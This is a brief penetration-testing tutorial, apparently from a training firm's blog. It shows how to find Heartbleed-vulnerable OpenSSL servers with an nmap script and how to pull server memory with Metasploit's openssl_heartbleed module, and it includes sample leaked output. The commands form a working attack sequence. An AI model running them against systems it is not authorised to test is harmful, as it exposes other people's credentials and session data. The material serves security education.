TROJAN HORSE SECURITY IS TEACHING THESE CONCEPTS FOR EDUCATIONAL PURPOSES ONLY. WE DO NOT CONDONE ILLEGAL HACKING. TROJAN HORSE SECURITY CONSULTANTS ARE HIRED AS ETHICAL HACKERS AT THE REQUEST OF ORGANIZATIONS WITH PERMISSION TO HACK THEIR NETWORKS AND SYSTEMS.
Heartbleed was one of the exploits that was so impactful to so many systems that it sent waves through the IT industry.
Heartbleed is very simple to exploit and can be very deadly.
The easiest way to find vulnerable systems is with Nmap. Run the following command on your Linux system:
# nmap -p 443 --script ssl-heartbleed <target(s)>
PORT STATE SERVICE
443/tcp open https
| The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. It allows for stealing information intended to be protected by SSL/TLS encryption.
| State: VULNERABLE
As you can see, this has found a vulnerable system.
Next, to exploit this, launch Metasploit. Remember to start the database service!
# service postgresql start
Once launched, use the following commands to use the Heartbleed module:
msf > use auxiliary/scanner/ssl/openssl_heartbleed
msf auxiliary(\(\(\(\(openssl_heartbleed) > set VERBOSE TRUE
msf auxiliary(\(\(\(\(openssl_heartbleed) > set RHOSTS 192.168.1.1
msf auxiliary(\(\(\(\(openssl_heartbleed) > run
Sending Client Hello...
Heartbeat response, checking if there is data leaked...
Heartbeat response with leak
Printable info leaked:
@SKO0'94wiW*G):[f"!98532ED/Ait/537.36 (KHTML, like Gecko)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
You will notice here that Metasploit communicated with the server and was able to pull random data from the server’s memory. The important thing to note here is that it pulls random data from memory. There is no guarantee that you will find account credentials, session cookie data or critical data every time you run this, however, the danger is that it could display sensitive data.
Trojan Horse Security offers official testing and certification as a Certified Cyber Hacker (CCH).